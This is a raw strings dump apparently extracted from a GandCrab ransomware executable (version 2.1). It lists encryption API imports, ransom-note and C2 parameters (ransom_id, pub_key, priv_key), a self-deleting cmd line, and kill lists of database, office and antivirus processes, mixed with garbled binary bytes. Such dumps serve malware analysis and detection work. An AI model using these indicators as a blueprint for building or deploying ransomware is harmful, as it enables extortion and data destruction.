!This =
n6m cannot be run in DOS mode.
`.rdata
@.rsrc
@.reloc
SVWj@h
D$DP,@
<}tK<=tBF
<}t)F<=t
HthHuo
<}tcG<=t
SVWj@h
SVWj@h
D$$PQh
D$$PWh
D$$PWh
SVWj@h
SVWj@h
QSVWj@h
0SWj@h
L&&jl66Z~??A
Oh44\Q
sb11S*
uB!!c
D""fT**~;
;d22Vt::N
J%%o\..r8
gg}V++
jL&&Zl66A~??
Sb11?*
tX,,.4
RRMv;;a
MMUf33
PPDx<<
cB!!0
~~Gz==
fD""~T**
Vd22Nt::
xxoJ%%r\..$8
tt!>��
ppB|>>
aa_j55
UUxP((z
&jL&6Zl6?A~?
~=Gz=d
"fD"*~T*
2Vd2:Nt:
x%oJ%.r\.
t�!>�K
a5_j5W
=&&jL66Zl??A~
g99KrJJ
==Gzdd
""fD**~T
22Vd::Nt
$$lH\\
77Ynmm
%%oJ..r\
��!>KK
55_jWW
[T:$6.
[.:$6g
j_FbT~
h4,8$@_
2\tHlWB
PQAeS~
~4[C)v
8$4,6-9'$6.:*?#1pHhX~AeSlZrNbS
EHl\tFeQ
T~FbZwKi
,8$4'6-9:$6.1*?#XpHhS~AeNlZrEbS
FeQbT~FiZwK
4,8$9'6-.:$6#1*?hXpHeS~ArNlZ
EbS\tHlQ
FeFbT~KiZw
$4,8-9'66.:$?#1*HhXpAeS~ZrNlS
Ebl\tHeQ
F~FbTwKiZ
pub_key
DELETE}
{DELETE}
advapi32.dll
CheckTokenMembership
Address:
fabian wosar <3
Can't find server
aeriedjD#shasj
*******************
RtlComputeCrc32
GandCrabGandCrabnomoreransom.bit|
ExitProcess
lstrlenA
HeapAlloc
HeapFree
GetProcessHeap
GetProcAddress
VirtualAlloc
GetModuleHandleA
lstrcpyA
GetEnvironmentVariableW
GetFileSize
MapViewOfFile
UnmapViewOfFile
GetModuleHandleW
WriteFile
GetModuleFileNameW
CreateFileW
ExitThread
lstrlenW
GetTempPathW
CreateFileMappingW
lstrcatW
CloseHandle
CreateThread
VirtualFree
lstrcmpiW
lstrcmpiA
SetFilePointer
GetFileAttributesW
ReadFile
GetLastError
MoveFileW
lstrcpyW
SetFileAttributesW
CreateMutexW
GetDriveTypeW
VerSetConditionMask
WaitForSingleObject
GetTickCount
InitializeCriticalSection
OpenProcess
GetSystemDirectoryW
TerminateThread
TerminateProcess
VerifyVersionInfoW
WaitForMultipleObjects
DeleteCriticalSection
ExpandEnvironmentStringsW
CreateProcessW
SetHandleInformation
lstrcatA
MultiByteToWideChar
CreatePipe
Process32FirstW
Process32NextW
CreateToolhelp32Snapshot
LeaveCriticalSection
EnterCriticalSection
FindFirstFileW
lstrcmpW
FindClose
FindNextFileW
GetNativeSystemInfo
GetComputerNameW
GetDiskFreeSpaceW
GetWindowsDirectoryW
GetVolumeInformationW
LoadLibraryA
KERNEL32.dll
DispatchMessageW
DefWindowProcW
UpdateWindow
SendMessageW
CreateWindowExW
ShowWindow
SetWindowLongW
LoadIconW
RegisterClassExW
TranslateMessage
wsprintfW
BeginPaint
LoadCursorW
GetMessageW
DestroyWindow
EndPaint
GetForegroundWindow
USER32.dll
TextOutW
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegSetValueExW
AllocateAndInitializeSid
FreeSid
CryptExportKey
CryptAcquireContextW
CryptGetKeyParam
CryptReleaseContext
CryptImportKey
CryptEncrypt
CryptGenKey
CryptDestroyKey
GetUserNameW
RegQueryValueExW
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
CryptStringToBinaryA
CryptBinaryToStringA
CRYPT32.dll
InternetOpenW
InternetReadFile
InternetConnectW
HttpSendRequestW
HttpAddRequestHeadersW
HttpOpenRequestW
InternetCloseHandle
WININET.dll
GetDeviceDriverBaseNameW
EnumDeviceDrivers
PSAPI.DLL
IsProcessorFeaturePresent
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
1#1-171A1i1s1}1
2:2D2N2X2b2l2v2
3�3)333=3G3^3h3r3|3
4/494C4M4W4g4q4{4
5(585B5L5V5~5
6'6O6Y6c6m6w6
6 7*747>7H7R7\7s7}7
8#8-8D8N8X8b8l8|8
9�9)939=9M9W9a9k9
:(:2:<:d:n:x:
;5;?;I;S;];g;q;
='=1=;=E=m=w=
>?>I>S>]>g>q>{>
?%?/?9?C?M?e?o?y?
0�070A0K0U0_0o0y0
1'111A1K1U1_1
2'212Y2c2m2w2
3+353?3I3S3]3g3
4%4/494Q4[4e4o4y4
5#5-575A5K5[5e5o5y5
6-676A6K6s6}6
7E7O7Y7c7m7w7
7N8k8{8
<0<7<I<Z<b<
>0>U>[>j>w>
1S2]2d2u2
6(6Z6e6m6
8-989p9x9
:#:1:8:H:N:
=-=B=H=
>'>L>j>
0"0)030:0D0Q0k0
151A1I1Q1V1
6W6_6g6o6w6
7�7*757@7K7V7a7l7w7
8&8-878L8e8
:.:4:T:Z:|:
:/;=;q;{;
>&>+>1>;>U>g>
>N?\?y?
0(0-050=0g0m0
2!222Q2`2
3+3=3L3S3a3
4�4,494D4l4s4
:�:R:\:n:~:
>%>/>;>D>P>
0$000:0J0V0
1%1*1@1T1h1|1
232D2p2x2
5&5-5U5s5~5
6/6W6^6e6
6%7+707G7q7~7
8�808[8i8p8~8
9%989=9M9\9e9{9
:,:::N:\:p:~:
;";);7;E;X;i;w;
< <6<A<W<b<x<
<(=I=Y=h=q=
=!>&>B>J>
>B?b?m?
0 0P0b0}0
20292H2Z2_2s2~2
3�3&3-343S3[3
3 4*434<4R4^4f4r4}4
5*5R5Y5`5g5n5u5|5
6'6L6Q6Y6a6h6v6
:4:a:k:u:
;4;b;n;t;
=O>]>l>
>6?C?R?\?b?
0�0g0n0~0
0$1+1;1H1s1z1
2H2O2^2h2n2
3$333=3C3
7#7+7074787a7
9A9H9L9P9T9X9\9`9d9
jjjjjj
AppData
\Microsoft\
GandCrab!
win32app
firefox
ransom_id
os_bit
os_major
pc_keyb
pc_lang
pc_group
pc_name
pc_user
ransom_id=
{USERID}
Global\
msftesql.exe
sqlagent.exe
sqlbrowser.exe
sqlservr.exe
sqlwriter.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe
mydesktopqos.exe
agntsvc.exeisqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
agntsvc.exeagntsvc.exe
agntsvc.exeencsvc.exe
firefoxconfig.exe
tbirdconfig.exe
ocomm.exe
mysqld.exe
mysqld-nt.exe
mysqld-opt.exe
dbeng50.exe
sqbcoreservice.exe
excel.exe
infopath.exe
msaccess.exe
mspub.exe
onenote.exe
outlook.exe
powerpnt.exe
steam.exe
thebat.exe
thebat64.exe
thunderbird.exe
visio.exe
winword.exe
wordpad.exe
/c timeout -c 5 & del "%s" /f /q
cmd.exe
Content-Type: application/x-www-form-urlencoded
curl.php?token=
action=result&e_files=%d&e_size=%I64u&e_time=%d&
action=call&
&pub_key=
&priv_key=
&version=2.1
Microsoft Enhanced Cryptographic Provider v1.0
\ProgramData\
\Program Files\
\Tor Browser\
Ransomware
\All Users\
\Local Settings\
desktop.ini
autorun.inf
ntuser.dat
iconcache.db
bootsect.bak
boot.ini
ntuser.dat.log
thumbs.db
GDCB-DECRYPT.txt
%s\GDCB-DECRYPT.txt
ipv4bot.whatismyipaddress.com
undefined
Domain
SYSTEM\CurrentControlSet\services\Tcpip\Parameters
WORKGROUP
LocaleName
Control Panel\International
Keyboard Layout\Preload
00000419
productName
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion
Itanium
Unknown
ProcessorNameString
HARDWARE\DESCRIPTION\System\CentralProcessor\0
Identifier
2ntdll.dll
UNKNOWN
NO_ROOT_DIR
REMOVABLE
REMOTE
RAMDISK
%I64u/
AVP.EXE
ekrn.exe
avgnt.exe
ashDisp.exe
NortonAntiBot.exe
Mcshield.exe
avengine.exe
cmdagent.exe
smc.exe
persfw.exe
pccpfw.exe
fsguiexe.exe
cfp.exe
msmpeng.exe
HTTP/1.1
